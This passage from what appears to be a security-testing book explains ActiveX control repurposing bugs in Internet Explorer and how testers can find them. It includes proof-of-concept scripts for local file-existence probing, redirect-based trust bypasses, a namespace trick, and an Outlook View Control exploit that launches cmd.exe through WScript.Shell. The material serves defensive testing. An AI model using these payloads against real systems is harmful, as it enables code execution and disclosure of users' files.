Understanding ActiveX Controls

 <script language=javascript>     var MediaPlayer = new ActiveXObject("WMPlayer.OCX"); </script> 

 <object ID=MyObj    classid="clsid:12345678-1234-1234-5678-ABCDEF012345"    width=50 height=50>  <param name="CustomProperty1" value="Attacker's Data">  <param name="CustomProperty2" value="Untrusted Input"> </object> <script>    //Calling Methods    MyObj.MethodName("Parameter1", 7);        //Getting and setting properties    alert(MyObj.Property1);    MyObj.Property2 = "NewPropertyValue"; </script> <script language=vbscript>  'Event Handler  Sub MyObj_EventName(EventParameter1, EventParameter2)     MsgBox "MyObj_EventName fired."     MsgBox EventParameter1     MsgBox EventParameter2  End Sub </script> 

 <script>     MyObject.DoSomething(Fantastic); </script> 

 <script>    MyObject.DoSomething(Malicious); </script> 

Using ActiveX SiteLock

The first impulse many people have when learning about ActiveX control repurposing bugs is to try to write some code to restrict which domain the control can be hosted in, but it s easy to implement this incorrectly. Microsoft provides a C++ template known as SiteLock you can use at http://msdn.microsoft.com/archive/en-us/samples/internet/components/sitelock/default.asp . Just because a control uses some method of restricting which sites can load it doesn t mean an attacker can t repurpose the control. For example, if the control loads only in a domain that has a cross-site scripting bug, attackers can use the cross-site scripting bug to script the control and bypass the site-locking mechanism. For more information about cross-site scripting, see Chapter 10, HTML Scripting Attacks.

Your ActiveX controls should never rely on site locking mechanisms for security. Site locking is a layer of defense but assume from a testing perspective that it will be broken. If your control implements site locking, you should test that the implementation is robust against canonicalization and naming attacks, such as http://secunia.com/advisories/19521/ (see Chapter 12, Canonicalization Issues for more information about how to test for these types of issues).

Site-locked controls still need to be tested for repurposing issues. One way to test these controls is to create appropriate domain entries in the %windir%\ system32\drivers\etc\ hosts file on your client test machine. Other ways include patching the binary or creating special test-only builds that always return S_OK when IObjectSafety::SetInterfaceSafetyOptions is called (be very careful you don t accidentally ship this way).

ActiveX Repurposing: Causes

Here are some common causes of ActiveX code repurposing bugs. These are common bad practices:

• COM interfaces not intended for use from the Internet were marked as safe accidentally ”so Internet Explorer assumes they are safe when they in fact are not. One source of problems occurs when the programmer uses a wizard to generate the control or inherits from another set of interfaces without being aware of whether or not the control is marked safe.

• Controls are marked as safe to eliminate the security prompt, but the control really is not safe.

• Members (methods, properties, events) are added without due consideration or security review.

• The ActiveX control creators are not aware that the members in the control can be called by any HTML on the Internet.

Installation

One way for attackers to trigger a remote ActiveX control to be installed from their server is by using the optional codebase attribute on the < object > HTML tag. Accordingly, Internet Explorer has security around installing controls that involves a digital signature check. (Note that once the control is installed, the digital signature is never checked again before further use.) The browser can t fix the problem once the machine is compromised by a truly malicious Trojan ActiveX control. Because controls authored with nonmalicious intent from trusted sources can be repurposed as a separate attack, additional layers of security are built into Internet Explorer to allow legitimate developers to specify what level of security Internet Explorer should assume about their control.

Installation of other applications also places ActiveX controls on the system. Because controls ship with the operating system, Internet Explorer, and other commercial software, Internet Explorer needs a way to let users further restrict what those controls can do. This is detailed in the next few sections.

Instantiation (Instance Creation)

When a control is instantiated via the < object > HTML tag, Internet Explorer loads the control s program files and runs the code in them to actually create a separate copy of the control in memory. Much documentation uses vague terms such as load , run , or create , but these vague terms typically fail to distinguish the act of instantiating the control from the act of initializing the control by sending data and parameters to the control (which is covered in the next section because it happens after instantiation is finished). The distinction is critical for security.

As discussed in the previous section, when Internet Explorer encounters an < object > HTML tag, it first checks to see whether the control referenced is installed. Once Internet Explorer has the correct version of the control, it then creates the object with IUnknown . Note that objects created through script are created with IDispatch or IDispatchEx .

Even COM objects not intended for use in Internet Explorer are instantiated in this way. This applies to all COM objects because Internet Explorer uses IUnknown , which is universally supported by all COM objects. All COM interfaces derive from IUnknown and supporting IUnknown is a fundamental COM requirement.

From the browser s point of view, legitimate COM controls should not do anything dangerous when they are instantiated. Such a control could have just as easily caused problems when it was first installed. Installation and instantiation might appear to be the same equivalence class from a security testing perspective, but actually there are cases in which buggy controls, when called from any calling application, cause problems. Although most controls are safe when instantiated, some crash. Crashes can cause data loss, but some crashes are even more serious, as in the case of javaproxy.dll, which unloaded prematurely, allowing still-existing object pointers to call into freed heap memory. Attackers who aggressively filled the heap with their data could then get their code to run. To catch this kind of bug, do a thorough code review of the DllCanUnloadNow function and make sure the object reference counts function properly. See http://www.sec- consult .com/184.html and http://www.microsoft.com/technet/security/advisory/903144.mspx for more information.

When the attacker can begin to manipulate controls with content specified in the document, things become even more interesting and repurposing becomes an issue. Internet Explorer has security around that as well.

Initialization

Once the control is instantiated and there is a place for it in memory, the next task is to initialize the control. Initialization refers to setting the initial, nondefault state of the control s properties. Some of this state is fairly well-defined : height , width . Some is custom ”for example: Folder , DataSource . The Web page has the opportunity to feed in the values used during the control s initialization. This is accomplished by persistent properties.

Persistent properties are specified by the < param > tags or the data attribute on the < object > tag when the control is loaded the first time, meaning you can take advantage of these persistent properties by repurposing them!

Control initialization happens through IPersist* interfaces. When multiple IPersist interfaces are present in the control, the data attribute of the < object > tag maps to IPersistStreamInit , IPersistStorage , IPersistFile , IPersistStream , and perhaps others (such as IPersistMoniker ). The < param > tag maps to IPersistPropertyBag , IPersistPropertyBag2 , and perhaps others. Internet Explorer prefers IPersistPropertyBag2 to IPersistPropertyBag if a control implements both.

Needless to say, there is a setting in Internet Explorer that governs whether to initialize the control with untrusted data or whether to initialize the control with default values.

Because IObjectSafety returns safe or unsafe based on arbitrary factors of the control programmer s choice as implemented in the control s IObjectSafety code when the control is run, and implementing IObjectSafety typically consumes development resources, it is reasonable to assume that if a control supports IObjectSafety , the control is safe under certain conditions and therefore the control should be tested as though it were marked as safe for scripting and safe for initialization unless further analysis demonstrates conclusively that the control is never safe for both GetInterfaceSafetyOptions and SetInterfaceSafetyOptions for all supported interfaces of concern.

In addition to sending data to a control, because Internet Explorer can allow script in the HTML to manipulate the control directly as well, there is additional security around scripting the control.

Scripting

Internet Explorer does not provide script support. It delegates that operation to a separate scripting engine. Internet Explorer and the script engine have settings to govern whether to let the script engine reference each control.

The active scripting setting is a switch that disables or enables all scripting in HTML in Internet Explorer. By extension, if script is disabled through the active scripting security setting, ActiveX controls are not scripted in Internet Explorer. (Note that some controls might be able to bypass this setting because they support running custom script or navigating to javascript: protocol handlers on control initialization.)

Once Internet Explorer tells the script engine about the control (hands it an IDispatch pointer), the script talks directly to the control and it is too late for Internet Explorer to stop future actions the script might do with the control.

Once the scripting engine knows about the control, the malicious script from the Web page can directly call methods, get and set properties, and access events in any order with any parameters, any number of times with no additional security checks of any kind done by Internet Explorer.

 C:\>AXDetail.exe {2D360201-FFF5-11d1-8D03-00A0C959BC0A} ActiveX Safety Detailer Version 1.0. Copyright (c) 2006 Microsoft Corporation. All Rights Reserved. CLSID: {2D360201-FFF5-11d1-8D03-00A0C959BC0A} Module: C:\Program Files\Common Files\Microsoft Shared\Triedit\dhtmled.ocx IObjectSafety call returned E_NOINTERFACE. Actually Calling interfaces to see what is available. IPersistPropertyBag is implemented. IPersistPropertyBag2 returns E_NOINTERFACE. IPersistStorage is implemented. IPersistStream returns E_NOINTERFACE. IPersistStreamInit is implemented. IPersistMemory returns E_NOINTERFACE. IPersistFile returns E_NOINTERFACE. IPersistMoniker returns E_NOINTERFACE. IDispatchEx returns E_NOINTERFACE. IDispatch is implemented. Registry SFS/SFI Component Categorization Analysis: Component is marked SFI in registry. Component is marked SFS in registry. ActiveX Compatibility Flags Analysis: There are no ActiveX Compatibility flags set. 

Discovering How the Control Works

Before you can properly and adequately construct security test cases, you need to know how the control works. Learning a little bit about what members a control supports is a step in the right direction, but it doesn t really tell you everything you need to know. How can you get the information you really need?

A lot of resources are available to help you figure out how a control and its members work, as follows:

• Experimenting with it     Sometimes it is fairly straightforward to figure out how a control works just by looking at the members and the parameters and playing with it a bit by trying HTML in the browser.

• Tools     The next section covers a few useful tools in greater detail. Some tools give more information than you might think ”for example, using tools like FileMon and Network Monitor in combination with the Load member makes a lot of sense. For more information about these tools, see Appendix A, Tools of the Trade.

• Bug reports     Bug reports and support articles about the member often contain sample code or descriptions of how the members work.

• Software development kit or Help     Sometimes there is useful information in documentation that provides details on how the control or various members work.

• Specifications     Sometimes the specification can provide information on how controls or members work.

• Web pages     Often product UI or Web pages use the control. Viewing the HTML source is your friend. Look at what these pages do and how they use the control for clues.

• Test cases     Existing test cases that cover testing the control or related functionality can prove useful.

• Programmers     It is totally reasonable to sit down and socially engineer (ask) the programmer to go over how the control works ”you need to test it, and to test it you need to know how it works.

• Looking at the source code     Ultimately, if you can t figure out how it works or need more details, consult the source code.

• Internet     Don t forget to plug the CLSID into your favorite Web search engine ”take advantage of its uniqueness. If the control is being used externally, the Internet can contain useful information about how the control works.

• Reverse engineering     If you don t have the source code for a control, the problem of figuring out how the control works is well within your grasp.

Tools of Interest

Once you have determined a particular control is safe for scripting (and/or safe for initialization) and therefore warrants more attention, look at all of the members on a case-by-case basis to determine more granular test cases of interest. This section outlines using a variety of tools and ways of determining which members a control supports.

Using tools can enhance the testing experience and teach you a lot about the control, but there is no substitute for testing each control by creating HTML and loading it in the Web browser ”other environments (such as inserting the control in a C# app) might make some aspects easier, but often data marshalling and other environmental differences vary considerably. In short, you re not really testing the control s actual behavior until it is loading in the target environment the way an attacker would load it.

Tool: Object Browser     Object Browser, shown in Figure 18-3, ships with Microsoft Visual Basic, Visual Basic for Applications (Microsoft Office), and Visual Studio. Object Browser shows you quite a bit of information about objects, such as information a control publishes about itself.

Figure 18-3: Object Browser, shown here with the DHTML Edit Control loaded

Object Browser s strong points are as follows:

• Easy to get at objects that are referenced by other objects

• Good, understandable presentation of prototypes

Its main weak points are these:

• Members with the hidden attribute set are not necessarily displayed by default. Members with this attribute set are callable, so they need to be tested.

• Unclear from the presentation which COM objects are controls.

• No direct interoperability with the objects.

• Does not handle PARAMs.

Tool: OLEView     OLEView, shown in Figure 18-4, ships with Visual Studio. It is also available as a sample application with source from http://msdn.microsoft.com/library/default.asp?url=/library/en-us/vcsample/html/_sample_mfc_oleview.asp . OLEView provides a lot of information about COM classes and can be useful in finding out more about the ActiveX controls you are testing. OLEView also comes with a TypeLib viewer (ITypeLib Viewer), as shown in Figure 18-5. Compare the level of information given by the OLEView TypeLib viewer with Object Browser (shown in Figure 18-3).

Figure 18-4: OLEView

Figure 18-5: TypeLib viewer in OLEView

OLEView s strong points are as follows:

• Most thorough at giving all of the attributes of calls.

• Easy to get the CLSID on the Clipboard.

• Source code available.

• OLEView tells you which interfaces an object supports.

The main caveats for OLEView are these:

• Most of the info in OLEView can be obtained from looking at the IDL/ODL (Interface/ Object Definition Language) file in the source. The IDL file contains the member names and parameters and types.

• Falsely makes the assumption that only interfaces marked as controls are controls.

• No direct interoperability with the objects.

• Slow, often hangs , or is unable to get information (not all COM server programmers write code that works acceptably in arbitrary COM applications like OLEView).

• Does not handle PARAMs.

Tool: ActiveX Control Test Container     The ActiveX Control Test Container, shown in Figures 18-6 and 18-7, is available at http://msdn.microsoft.com/library/default.asp?url=/library/en-us/vcsample/html/vcsmpTSTCONActiveXControlTestContainer.asp . ActiveX Control Test Container tool is shown in Figure 18-6 with a Forms.CommandButton control loaded. Notice the control s events appear in the lower section of the application. In Figure 18-7, the Property Bag dialog box in ActiveX Control Test Container shows persistent properties the control supports. To open this dialog box click the Control menu, and then click Save To Property Bag.

Figure 18-6: A Forms.CommandButton control loaded in the ActiveX Control Test Container tool

Figure 18-7: Property Bag dialog box in ActiveX Control Test Container

ActiveX Control Test Container s strong points are as follows:

• Source code is available.

• Can show which persistent properties ( Stream , Storage , and PropertyBag ) the control supports.

• Lets you invoke methods and get and set properties, as well as see when events occur.

Its weak points are these:

• The tool works differently from how Internet Explorer works and should not be substituted for testing using Internet Explorer.

• Unclear from the tool which interfaces and methods are supported.

Tool: COMRaider     COMRaider, available from http://labs.idefense.com/labs-software.php?show=20 , while designed for fuzz testing ActiveX controls, provides a full range of features to help you identify and test ActiveX controls for security bugs.

One of the tool s biggest strengths is that it helps you test the control in the actual Web browser. Here is a brief summary of some of the features offered in the current version:

• Good at easily helping you find ActiveX controls that are considered safe by Internet Explorer. All you have to do is point it at a directory and it will automatically find the controls.

• Displays type information.

• Automation and fuzzing libraries to help you automate the testing.

• Generates some types of javascript test cases for you.

• Integrated debugging to get more information when your control crashes, and you can rerun the test to reproduce the bug.

Member-Level Threat Modeling

Once you have identified each of the members in the control and how the member works, walk through each member and think about the risk. Certainly, any information from the overall threat model for the control would be useful here as well, but in practice few threat models dig as deeply as necessary to cover each member. For more information, see Chapter 2, Using Threat Models for Security Testing.

To think about the risk, think about the actions an Internet server should not be able to do on any client machine. Think about all the cool things attackers can do to trusting users. Following is a prioritized list that can give you some idea of the types of actions controls often attempt to do but should not really be doing. Use this list in combination with what you know about the control and during code review to make HTML and script to try to repurpose each member to do something malicious.

1. Control should not make damaging system calls or allow arbitrary code to be run:

   • Causing buffer overflows or taking advantage of format string vulnerabilities

   • Launching an executable

   • Installing software

   • Modifying the registry (in a scriptable way)

   • Rebooting the machine

   • Starting a service that gives access to the machine remotely

2. Control should not modify or destroy information on the computer or bypass security settings:

   • Creating, editing, deleting files in a destructive way (even writing text can be bad if the attacker can specify where the file is created and inject batch file commands or can fill up the drive with junk)

   • Changing file or registry key permissions

   • Writing to an already-open connection of some sort (Dynamic Data Exchange (DDE), COM, Winsock, etc.)

   • Bypassing browser security settings.

3. Control should not allow access to information about the computer/user:

   • Revealing whether or not a file exists

   • Revealing which software is installed

   • Disclosing a particular user s actions or habits

   • Revealing a password or hash

   • Using the client credentials without warning at a different Web site

   • Revealing the computer s name

   • Revealing the local IP address

   • More suggestions which may apply can be found at http://www.microsoft.com/security/glossary.mspx#personally_identifiable_information

4. Control should not give away any other inappropriate information (see Chapter 7, Information Disclosure for more information about how to test for information disclosure):

   • Revealing contents of files/documents

   • Revealing Clipboard data

   • Disclosing information from another browser window, domain, frame, document, external application, and the like

5. Control should not be able to be used in a deceptive manner:

   • Repurposing of the control by a malicious site; the user is fooled by the familiar UI of the control and does not realize the site is bad (example might be Microsoft Passport or mail server logon)

   • Exposing interfaces that directly instantiate or call other unsafe controls or interfaces not otherwise accessible to script

   • Failing to warn users before taking certain kinds of action

   • Warning users but not acting consistently with the warning (saying one thing, but doing something else)

6. Control should not use excessive resources locally:

   • Using up disk space/memory

   • Maxing out the processor (CPU)

   • Creating a lot of threads, handles, windows, and so forth

   • Failing to free resources and so forth on control uninitialization

7. Control should not generate a fault that crashes or hangs the browser or operating system:

   • Not handling malformed data as input

   • Not handling exceptions

Exception Handlers: Using try-catch

In general, ActiveX controls should not disclose information about which files exist on the local hard disk, but often the errors that ActiveX controls return to Internet Explorer give this useful information to an attacker. To retrieve these exceptions in JavaScript, add a try - catch block around test code that calls the method or property that throws the error. Primarily, these bugs exist in methods and properties with names like Load , Open , or *File . Basically, test anything that tries to load or open a file.

Following is a simple example of how to construct this test case, but it is not necessarily complete. In this example, the ConfigLocation property that exists on the ActiveX control is set to a file for which the attacker wants to verify its existence. If the file successfully loads, the code will not enter the catch section; if the file does not load, it does enter that section.

 <OBJECT id="AX" classid=CLSID:12345678-1234-1234-1234-123456789ABC> <script> try { AX.ConfigLocation = "c:\secret.txt"; alert("File exists!"); } catch (oException) { alert("File does not exist"); } </script> 

Just because the code went into the catch section because the control threw an exception does not necessarily mean that the file does not exist. Potentially, a number of things could fail on load (an example is a cross-domain warning was cancelled) that could also cause an error.Attackers can probe the details of the error, however, if the control provides those details.

When the code hits the catch block, different errors are represented by different numbers . In this particular example, here is how the ConfigLocation property works:

1. It takes the value of the filename.

2. It first checks to see whether the extension is .xml or .txt.

3. It then checks for the file s existence.

4. Finally, it checks to see if it s a valid XML file.

Errors can occur in at least three different places here, and because of this, the different error numbers returned give attackers key information.

To work through this, attackers can add logic to their catch statement that will look for a specific exception number to occur, like so:

 <OBJECT id="AX" classid=CLSID:12345678-1234-1234-1234-123456789ABC> <script> try {      AX.ConfigLocation = "c:\secret.txt";      alert("File exists!"); } catch (oException) { //This is the number we identified to mean that the file does not exist.      if (oException.number == "2476697211") {           alert("File does not exist");      }      else {           alert("File exists!");      } } </script> 

Return Values

The programmer might have done a good job and made sure that the exceptions that can be caught are indistinguishable when a file exists or when a file doesn t exist, but there are still other ways of finding out if the file really exists or not. Does the *Load method return anything?

Consider the following code, for example, which calls a method OpenFile . Suppose that after trying the try-catch method and a couple other cases, everything seems fine.

 <script> OpenFile("c:\secret.txt"); </script> 

Digging a little deeper, you learn that the return value of the OpenFile method is a Boolean value. That s interesting. What happens when an attacker tries to exploit it?

 <script> //If the return value is true, we know the file exists. if (OpenFile("c:\secret.txt")) {      alert("File Exists!"); } else {      alert("File Does Not Exist"); } </script> 

Because the return value of OpenFile is a Boolean value (although this would work equally well for long values and other data types), you can use that to your advantage. Specifically looking at the return value in this case tells you whether the file exists.

Nested Objects

Attackers love this little secret: the scripting engine in Internet Explorer has no security in and of itself once it has an interface pointer. This means you can access unsafe objects through safe objects with no warning to the user, which means of course that those safe objects are really not very safe.

Look at an example. The Microsoft Office Outlook View Control is great for Internet solution providers and developers who want to integrate Outlook s functionality with other cool stuff. This control also turned out to be an insecure example of how an ActiveX control can allow script in Web pages to access more powerful COM objects that Internet Explorer would never allow script to create.

 <object id="ViewControl" classid="clsid:0006F063-0000-0000-C000-000000000046"> <param name="Folder" value="Inbox"> </object> <script> function DoIt() { oItem=ViewControl.object.selection.Item(1); oWSh=oItem.Session.Application.CreateObject("WScript.Shell"); oWSh.Run("cmd.exe /k echo ProofOfConcept"); } setTimeout("DoIt()",2500); </script> 

How does this work? The attacker first specifies Inbox as a parameter on the < object > tag because the Inbox is one of the most likely folders to contain an item.

 <object id="ViewControl" classid="clsid:0006F063-0000-0000-C000-000000000046"> <param name="Folder" value="Inbox"> </object> 

The first script to run is the setTimeout( DoIt() ,2500); call, which waits 2.5 seconds (the attacker needs this because Outlook sometimes takes a little time to talk to the mail server and load the Inbox). Then the script calls a function (named DoIt ), which is where the payload lives.

 function DoIt() { oItem=ViewControl.object.selection.Item(1); oWSh=oItem.Session.Application.CreateObject("WScript.Shell"); oWSh.Run("cmd.exe /k echo ProofOfConcept"); } 

How does function DoIt work?

 oItem=ViewControl.object.selection.Item(1); 

The ViewControl.object addresses the object model of the control itself, rather than talking to Internet Explorer, which overrides the fact that Internet Explorer will return something different for the selection property if the exploit referenced ViewControl.selection instead. The ViewControl.object.selection is a collection of MailItem objects, which can be stored in a variable in JavaScript even though it is not directly creatable in JavaScript.

Because ViewControl.object.selection is a collection, it supports the Item method to retrieve a single item from the collection, so the attacker then gets the first item in the Inbox (the Outlook collections are one-based, unlike Internet Explorer collections, which are zero-based ) and puts it into oItem. The Outlook View Control isn t referenced by the script engine anymore at all. The script now has a regular Outlook MailItem object. The MailItem object is not safe at all, but there was no warning because the Outlook view control created the object, not Internet Explorer.

 oWSh=oItem.Session.Application.CreateObject("WScript.Shell"); 

Which properties and methods does that object support? Well, it turns out script can get the Messaging Application Programming Interface (MAPI) Session , and then the main Out look.Application object. That object has a CreateObject method that will create any COM object on the local system, so a good choice is the Windows Scripting Host (WSH) WScript.Shell object (which runs any commands).

 oWSh.Run("cmd.exe /k echo ProofOfConcept"); 

Normally, the WScript.Shell object is not scriptable because it cannot be created in script by Internet Explorer without low security settings and prompts. But what happened instead was the Outlook View Control created the Outlook.Application object, which in turn created the WScript.Shell object. After that, the object became scriptable in Internet Explorer.

How can you spot these kinds of objects? Look for collections of objects and methods and properties that can return objects. Object Browser and OLEView can indicate when members are objects. Essentially, there are five data types to watch out for:

• The IDispatch and IDispatch* objects are definitely objects, 100 percent of the time. Note that the trailing asterisk(*) indicates this data type is a pointer rather than a value.

• VARIANT and VARIANT* mean the data type is unclear and might contain anything (including objects). Note that the VARIANT data type without the asterisk (*) can still contain interface pointers.

• Data types that resolve to objects in the debugger Watch window.

• Data types that have variables that return [object] in Internet Explorer with alert(variable); .

• Unrecognizable data types.

Control Persistence ” Browser Helper Objects (BHOs)

Consider the COM component that doesn t go away when the HTML page is unloaded. Browser Helper Objects (BHOs) are an example of this class of component. They are different from ActiveX controls in that they usually load when Internet Explorer starts or the user clicks a menu item, and they respond to various events such as navigating to a Web page or submitting a form. BHOs have full access to programmatically manipulate the Web browser and all of the content on the Web pages. BHOs can be scripted from the web page, and they are just as vulnerable as other ActiveX controls to repurposing attacks.

If your control has BHO functionality or if it remains active after the user navigates away from the page, you need to consider carefully the following example of a particular control because it allowed any malicious user to track the Internet usage of victims.

This feature manages Web server discussion threads and appears when the appropriate page is viewed in Internet Explorer, which would display the Discussions toolbar at the bottom of the application window. The user could then use the commands on this toolbar to add a discussion server, specify what information will be displayed for a discussion, or subscribe to a particular Web page, or folder on a Web server.

In this particular case, the control has two interesting methods:

• One that turns on the Discussions toolbar

• Another that sets the default Discussion Server

The control by itself doesn t seem so bad, except that it had a weakness in how it communicates with the server. Once the Discussions toolbar is enabled, the control communicates with the specified server to see whether the server has any discussions for the given URL. It does this through an HTTP request that passes in the URL of the page the user is on as a query string parameter.

So the attacker s script can launch the toolbar and set their server to be the default. Then, the attacker only needs to view their Web logs to see which sites their victims are visiting. This can prove even worse for sites that pass session information or other juicy goods in query string parameters (even over Secure Sockets Layer) when the victim logs on or submits sensitive information.

Server Redirection

If your control asks the user to make security decisions based on the domain in a URL or presents the URL to the user to ask permission to process the URL in a particular way that might be insecure, you need to test for server redirection. Suppose the control has a simple method LoadFromURL that takes one parameter, a string value of the URL to load from. It looks like this:

 <script> AX.LoadFromURL("http://www.good.example.com/goodpage.asp"); </script> 

When the method is called, a dialog box comes up asking whether the user really wants to load the file from the good.example.com domain. Because the user trusts good.example.com , of course the user trusts the file. Then, change the URL:

 <script> var sURL = "http://www.good.example.com/?redir="; sURL += "http://www.bad.example.com/badpage.asp"; AX.LoadFromURL(sURL); </script> 

The dialog box opens again and asks whether the user wants to load the page from good.example.com . The user trusts good.example.com and so clicks OK. The control loads the file from bad.example.com .

Why does this happen? Is redirection the problem? Redirection is perfectly legitimate, and lots of sites do this. In this case, good.example.com has a page on its site that helps to redirect users to other pages on its site.

How does this work? The Active Server Page (ASP) page grabs the redir query string request value and issues a Response.Redirect command, passing in the redir query string (in this case, the bad.example.com page) as the URL to redirect to. Response.Redirect then sends down to the client a 302 (Object Moved) or similar HTTP response with the new location for the client to request ( bad.example.com ).

The attacker reused the control and a server s redirection to fool the user into loading a file from a URL the user might not trust. Some application programming interfaces (APIs) available to developers automatically follow the redirect, so behind the scenes everything just works ”for the attacker, that is.

Bypassing Browser Security Settings

In Internet Explorer 6 Service Pack 1 (SP1), the Internet Explorer team went a long way toward mitigating local cross-site scripting (XSS) attacks from the Internet domain. To implement a complete solution to local cross-site scripting attacks, ActiveX controls should also comply and not redirect to local content. If an ActiveX control redirects to local content when Internet Explorer bans such redirection, your ActiveX control serves as a method an attacker can use to bypass Internet Explorer security settings.

To find these bugs, first identify places in the control that load files or consume URLs. Next, try using these members of the ActiveX control to load local files. Finally, assess the result of your efforts by looking at the behavior of the control or using other tools such as FileMon. Briefly, here s how one example works:

 <object    classid="clsid:{12345678-1232-1234-3212-345654321234}"    id="objBuggy"> </object> <script>    // The control loads the URL specified in script in a new    //window in which it is hosting HTML.  objBuggy.IsEditMode=1;    //Redirect to a local file works fine    //Note that using equivalent script in Internet Explorer    // without the ActiveX control would fail because of the    // Internet Explorer security which blocks the action.  objBuggy.Url = "c:\foo.html#javascript:DoBadStuff()";    //Go for it!  objBuggy.ShowHTMLWindow; </script> 

Namespaces and Behaviors

Binary behaviors work like ActiveX controls that bind to specific HTML tags and can be initialized with tag properties and scripted by referencing the ID or name of the tag. Behaviors have the ability to control all aspects of HTML elements (catching events, setting values, and more). Binary behaviors are just like ActiveX controls from a security standpoint. You can find out more about binary behaviors at http://msdn.microsoft.com/library/default.asp?url=/workshop/browser/behaviors/howto/belementb.asp .

One particular ActiveX control programmer implemented a binary behavior to block potential malicious attacks using the control s ImportList method. In normal usage, the control was loaded as a behavior off of the <input type=file /> element as follows:

 <object classid="clsid:{BDEADE9E-C265-11d0-BCED-00A0C90AB50F}"  id="LauncherObj" style="display:none;"></object> <input id="SpreadsheetFile" Type="file" Name="SpreadsheetFile"  style="behavior: url(#LauncherObj);"> 

The <input type=file /> HTML element does not let script set the value property (which contains the filename to upload), otherwise malicious Web sites could upload arbitrary files from users hard disks. Knowing this, the programmer of the control added a security check to make sure it could bind only to the HTML < input > elements of Type=file .

How can the attacker bypass this binary behavior s security mechanism? There wasn t any way for the control to access files directly through the input element; instead, the attacker must fool the control into thinking it was loaded into an input element when in fact some other element bound to the behavior. This was done using HTML namespaces and expandos .

In a nutshell , a namespace can be added to any HTML document as follows:

 <HTML XMLNS:EVIL> 

In this example, the namespace is EVIL . A given HTML tag can be included in that namespace by prepending the namespace name to the tag name:

 <EVIL:IMG src="http://www.example.com/ing.jpg"> 

By defining an HTML namespace (called input ) the attacker fooled the control into thinking it was loaded by the <input type=file /> element; then, by setting the expando value=c:\filename.txt , the attacker could use the control to detect whether a local file existed, among other malicious things.